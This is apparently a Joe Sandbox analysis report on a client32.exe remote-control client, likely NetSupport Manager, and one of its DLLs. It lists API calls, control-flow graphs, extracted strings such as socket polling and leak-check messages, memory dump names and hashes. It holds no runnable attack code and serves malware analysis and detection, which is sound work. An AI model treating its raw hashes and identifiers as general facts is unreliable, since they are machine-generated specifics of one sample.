                                                                                                                                                    • IsWindowVisible.USER32(00000000), ref: 1113A058
                                                                                                                                                    • IsWindowVisible.USER32(000A0036), ref: 1113A088
                                                                                                                                                    • IsIconic.USER32(000A0036), ref: 1113A095
                                                                                                                                                    • GetForegroundWindow.USER32 ref: 1113A09F
                                                                                                                                                      • Part of subcall function 11132120: ShowWindow.USER32(000A0036,00000000,?,11139EA2,00000007,?,?,?,?,?,00000000), ref: 11132144
                                                                                                                                                      • Part of subcall function 11132120: ShowWindow.USER32(000A0036,11139EA2,?,11139EA2,00000007,?,?,?,?,?,00000000), ref: 11132156
                                                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 1113A0C5
                                                                                                                                                    • EnableWindow.USER32(000A0036,00000001), ref: 1113A0D4
                                                                                                                                                    • GetLastError.KERNEL32 ref: 1113A193
                                                                                                                                                    • GetLastError.KERNEL32 ref: 1113A20B
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 1113A4B8
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 1113A4D9
                                                                                                                                                      • Part of subcall function 110261A0: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,1113A522), ref: 110261A8
                                                                                                                                                    • FreeLibrary.KERNEL32(?,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 1113A574
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$ForegroundVisible$Enable$CountErrorLastLibraryShowTick$CurrentFindFreeIconicLoadThread
                                                                                                                                                    • String ID: Audio$Client$File <%s> doesnt exist, e=%d$HideWhenIdle$HookDirectSound$MainWnd = %08x, visible %d, valid %d$NeedsReinstall$Reactivate main window$Shell_TrayWnd$ShowNeedsReinstall in 15, user=%s$disableRunplugin
                                                                                                                                                    • API String ID: 2511061093-2542869446
                                                                                                                                                    • Opcode ID: e14826bbac3d3f7ee8e0918d09fc5866bd4c7377ec69909a935bcd746c51be63
                                                                                                                                                    • Instruction ID: 9ececd2581658abecd2b9d282a3ee437682ea2591524154b6e9732358788741a
                                                                                                                                                    • Opcode Fuzzy Hash: e14826bbac3d3f7ee8e0918d09fc5866bd4c7377ec69909a935bcd746c51be63
                                                                                                                                                    • Instruction Fuzzy Hash: FC023675E11226DFE716DFA4DD94BAAFB65BBC131EF140138E4219728CEB30A844CB91
                                                                                                                                                    Function 11134830 Relevance: 51.0, APIs: 16, Strings: 13, Instructions: 278libraryloadertimeCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2318 11134830-1113486c 2319 11134872-11134894 call 1105e820 2318->2319 2320 11134b94-11134baf call 11162bb7 2318->2320 2319->2320 2325 1113489a-111348ae GetLocalTime 2319->2325 2326 111348d1-11134953 LoadLibraryA call 11009940 call 110161e0 GetCurrentProcess 2325->2326 2327 111348b0-111348cc call 11147060 2325->2327 2334 11134955-1113496b GetProcAddress 2326->2334 2335 1113496d-11134974 GetProcessHandleCount 2326->2335 2327->2326 2334->2335 2336 11134976-11134978 SetLastError 2334->2336 2337 1113497e-11134986 2335->2337 2336->2337 2338 111349a2-111349ae 2337->2338 2339 11134988-111349a0 GetProcAddress 2337->2339 2342 111349b0-111349c8 GetProcAddress 2338->2342 2343 111349ca-111349d5 2338->2343 2339->2338 2340 111349d7-111349e2 SetLastError 2339->2340 2340->2342 2342->2343 2344 111349e4-111349ec SetLastError 2342->2344 2345 111349ef-111349ff GetProcAddress 2343->2345 2344->2345 2347 11134a01-11134a0d K32GetProcessMemoryInfo 2345->2347 2348 11134a0f-11134a11 SetLastError 2345->2348 2349 11134a17-11134a25 2347->2349 2348->2349 2350 11134a33-11134a3e 2349->2350 2351 11134a27-11134a2f 2349->2351 2352 11134a40-11134a48 2350->2352 2353 11134a4c-11134a57 2350->2353 2351->2350 2352->2353 2354 11134a65-11134a6f 2353->2354 2355 11134a59-11134a61 2353->2355 2356 11134a71-11134a78 2354->2356 2357 11134a7a-11134a7d 2354->2357 2355->2354 2358 11134a7f-11134a8d call 11147060 2356->2358 2357->2358 2359 11134a90-11134aa2 2357->2359 2358->2359 2363 11134b6a-11134b78 2359->2363 2364 11134aa8-11134aba call 110642e0 2359->2364 2365 11134b7a-11134b7b FreeLibrary 2363->2365 2366 11134b7d-11134b85 2363->2366 2364->2363 2371 11134ac0-11134ae1 call 1105e820 2364->2371 2365->2366 2368 11134b87-11134b88 FreeLibrary 2366->2368 2369 11134b8a-11134b8f 2366->2369 2368->2369 2369->2320 2372 11134b91-11134b92 FreeLibrary 2369->2372 2375 11134ae3-11134ae9 2371->2375 2376 11134aef-11134b0b call 1105e820 2371->2376 2372->2320 2375->2376 2377 11134aeb 2375->2377 2380 11134b16-11134b32 call 1105e820 2376->2380 2381 11134b0d-11134b10 2376->2381 2377->2376 2385 11134b34-11134b37 2380->2385 2386 11134b3d-11134b59 call 1105e820 2380->2386 2381->2380 2382 11134b12 2381->2382 2382->2380 2385->2386 2388 11134b39 2385->2388 2390 11134b60-11134b63 2386->2390 2391 11134b5b-11134b5e 2386->2391 2388->2386 2390->2363 2392 11134b65 call 11027de0 2390->2392 2391->2390 2391->2392 2392->2363
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                                                    • GetLocalTime.KERNEL32(?,_debug,CheckLeaks,00000001,00000000,1EF76653), ref: 1113489E
                                                                                                                                                    • LoadLibraryA.KERNEL32(psapi.dll), ref: 111348F6
                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 11134937
                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetProcessHandleCount), ref: 11134961
                                                                                                                                                    • GetProcessHandleCount.KERNEL32(00000000,?), ref: 11134972
                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11134978
                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11134994
                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 111349BC
                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 111349D9
                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 111349E6
                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetProcessMemoryInfo), ref: 111349F8
                                                                                                                                                    • K32GetProcessMemoryInfo.KERNEL32(?,?,00000028), ref: 11134A0B
                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11134A11
                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 11134B7B
                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 11134B88
                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 11134B92
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressErrorLastLibraryProc$FreeProcess$CountCurrentHandleInfoLoadLocalMemoryTime__wcstoi64
                                                                                                                                                    • String ID: CheckLeaks$Client$Date=%04d-%02d-%02d$GetGuiResources$GetProcessHandleCount$GetProcessMemoryInfo$RestartGdiObj$RestartHandles$RestartMB$RestartUserObj$Used handles=%d, gdiObj=%d, userObj=%d, mem=%u kB$_debug$psapi.dll
                                                                                                                                                    • API String ID: 263027137-1001504656
                                                                                                                                                    • Opcode ID: e9bc53f18f3aff5df15c67e08978246e2bd3215a060d2d5924f045e3fecf3fd3
                                                                                                                                                    • Instruction ID: db8711c19b503e7e72fae74a2cc3466c9a493194fb08fa6cc11ddefe45185306
                                                                                                                                                    • Opcode Fuzzy Hash: e9bc53f18f3aff5df15c67e08978246e2bd3215a060d2d5924f045e3fecf3fd3
                                                                                                                                                    • Instruction Fuzzy Hash: 27B1AE78E402699FDB10CFE9CD80BADFBB5EB88319F104429E419E7648DB749884CB55
                                                                                                                                                    Function 6CA891F0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 97sleepnetworkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • #16.WSOCK32(00000000,009686C7,6CA93361,00000000,00000000,6CA93361,00000007), ref: 6CA8924C
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000,009686C7,6CA93361,00000000,00000000,6CA93361,00000007), ref: 6CA8925B
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 6CA89274
                                                                                                                                                    • Sleep.KERNEL32(00000001,00000000,009686C7,6CA93361,00000000,00000000,6CA93361,00000007), ref: 6CA892A8
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 6CA892B0
                                                                                                                                                    • Sleep.KERNEL32(00000014), ref: 6CA892BC
                                                                                                                                                    Strings
                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6CA89226
                                                                                                                                                    • ReadSocket - Would block, xrefs: 6CA8928A
                                                                                                                                                    • *RecvTimeout, xrefs: 6CA8927B
                                                                                                                                                    • hbuf->buflen - hbuf->datalen >= min_bytes_to_read, xrefs: 6CA8922B
                                                                                                                                                    • ReadSocket - Error %d reading response, xrefs: 6CA892F7
                                                                                                                                                    • ReadSocket - Connection has been closed by peer, xrefs: 6CA892E0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CountSleepTick$ErrorLast
                                                                                                                                                    • String ID: *RecvTimeout$ReadSocket - Connection has been closed by peer$ReadSocket - Error %d reading response$ReadSocket - Would block$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$hbuf->buflen - hbuf->datalen >= min_bytes_to_read
                                                                                                                                                    • API String ID: 2495545493-2497412063
                                                                                                                                                    • Opcode ID: 00ab8be4b623ec87a65a6869ab97bd56f6a945aa9a5feb3ddf05f3523abfffa8
                                                                                                                                                    • Instruction ID: c0a4e24ce8e0232d5374b21ffa9896bf84763ddb8151dbd0bd85284f090f74f2
                                                                                                                                                    • Opcode Fuzzy Hash: 00ab8be4b623ec87a65a6869ab97bd56f6a945aa9a5feb3ddf05f3523abfffa8
                                                                                                                                                    • Instruction Fuzzy Hash: A231C575F02208AFDB10DFB8DA84B9E77F4EB45328F104959E919D7A40E731D9C887A1
                                                                                                                                                    Function 6CA93130 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 178timethreadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetSystemTime.KERNEL32(?,?,?,9353354D,1737DA36,935334B3,FFFFFFFF,00000000), ref: 6CA931E2
                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,6CABECB0), ref: 6CA931EC
                                                                                                                                                    • GetSystemTime.KERNEL32(?,1737DA36,935334B3,FFFFFFFF,00000000), ref: 6CA9322A
                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000,6CABECB0), ref: 6CA93234
                                                                                                                                                    • EnterCriticalSection.KERNEL32(6CACB898,?,9353354D), ref: 6CA932BE
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6CACB898,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000), ref: 6CA932D3
                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CA9334D
                                                                                                                                                      • Part of subcall function 6CA9BA20: __strdup.LIBCMT ref: 6CA9BA3A
                                                                                                                                                      • Part of subcall function 6CA9BB00: _free.LIBCMT ref: 6CA9BB2D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Time$System$CriticalFileSection$CurrentEnterLeaveThread__strdup_free
                                                                                                                                                    • String ID: 1.1$ACK=1$CMD=POLL$INFO=1
                                                                                                                                                    • API String ID: 1510130979-3441452530
                                                                                                                                                    • Opcode ID: 0dc71f0876fab3f0fc95f03e2879bc67d1d3837deccdfacbd99f7a370255488b
                                                                                                                                                    • Instruction ID: 6b6e3d2086877a6af93966f351a8e12c4e1b470dfc9c3fb774c77a6273d93207
                                                                                                                                                    • Opcode Fuzzy Hash: 0dc71f0876fab3f0fc95f03e2879bc67d1d3837deccdfacbd99f7a370255488b
                                                                                                                                                    • Instruction Fuzzy Hash: 28617572A11209AFCB14DFA4D985EEEB7F5FF49304F04861DE416A3B40DB34A588CBA1
                                                                                                                                                    Function 11145C70 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 175registryCOMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetVersionExA.KERNEL32(111F1EF0,76968400), ref: 11145CA0
                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                                                                                    • _memset.LIBCMT ref: 11145CFD
                                                                                                                                                      • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,76968400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                                                                                                    • _strncpy.LIBCMT ref: 11145DCA
                                                                                                                                                      • Part of subcall function 111648ED: __isdigit_l.LIBCMT ref: 11164912
                                                                                                                                                    • RegCloseKey.KERNEL32(00000000), ref: 11145E66
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
                                                                                                                                                    • String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
                                                                                                                                                    • API String ID: 3299820421-2117887902
                                                                                                                                                    • Opcode ID: 929fb5d8b7f52e0b88e664298c84f703fc5a1542ba09115f26204fab96234c05
                                                                                                                                                    • Instruction ID: 72e9b589e9c81c7730d33f5d85faf9c496c6ad46d8e7039c924549f2bc0033ac
                                                                                                                                                    • Opcode Fuzzy Hash: 929fb5d8b7f52e0b88e664298c84f703fc5a1542ba09115f26204fab96234c05
                                                                                                                                                    • Instruction Fuzzy Hash: A4510871E0023BABDB21CF61CD41FDEF7B9AB01B0CF1040A9E91D66945E7B16A49CB91
                                                                                                                                                    Function 11116880 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 182librarycomloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 111168D5
                                                                                                                                                    • CoCreateInstance.OLE32(111C1AAC,00000000,00000001,111C1ABC,00000000,?,00000000,Client,silent,00000000,00000000,?,1104C49F), ref: 111168EF
                                                                                                                                                    • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 11116914
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11116926
                                                                                                                                                    • SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11116939
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11116945
                                                                                                                                                    • CoUninitialize.COMBASE(00000000), ref: 111169E1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
                                                                                                                                                    • String ID: SHELL32.DLL$SHGetSettings
                                                                                                                                                    • API String ID: 4195908086-2348320231
                                                                                                                                                    • Opcode ID: 7f4dfa4f84449ddd9057b5d12e5b7092daec7eaad03784577530b65d584c16e3
                                                                                                                                                    • Instruction ID: 86b6e15c13bd198e2be1b4906c6dc8e983a2f790f9ea6f3073e45f268e972f68
                                                                                                                                                    • Opcode Fuzzy Hash: 7f4dfa4f84449ddd9057b5d12e5b7092daec7eaad03784577530b65d584c16e3
                                                                                                                                                    • Instruction Fuzzy Hash: 81515175A00219AFDB00DFA5C9C0EAFFBB9EF48304F114969E915AB244E771A941CB61
                                                                                                                                                    Function 11073680 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 314COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset
                                                                                                                                                    • String ID: NBCTL32.DLL$_License$serial_no
                                                                                                                                                    • API String ID: 2102423945-35127696
                                                                                                                                                    • Opcode ID: 19c1bfdd6460f6a249e12eea9a2a20caa138c9ba89d8b6a2a5b87a7590f55589
                                                                                                                                                    • Instruction ID: b632ae2d06a9e035363f4f75e6ccaf6c516ded967162c2d69bbdd490d26a7599
                                                                                                                                                    • Opcode Fuzzy Hash: 19c1bfdd6460f6a249e12eea9a2a20caa138c9ba89d8b6a2a5b87a7590f55589
                                                                                                                                                    • Instruction Fuzzy Hash: A8B18075E04209ABE714CF98DC81FEEB7F5FF88304F158169E9499B285DB71A901CB90
                                                                                                                                                    Function 11031780 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(1102EA50,?,00000000), ref: 110317A4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
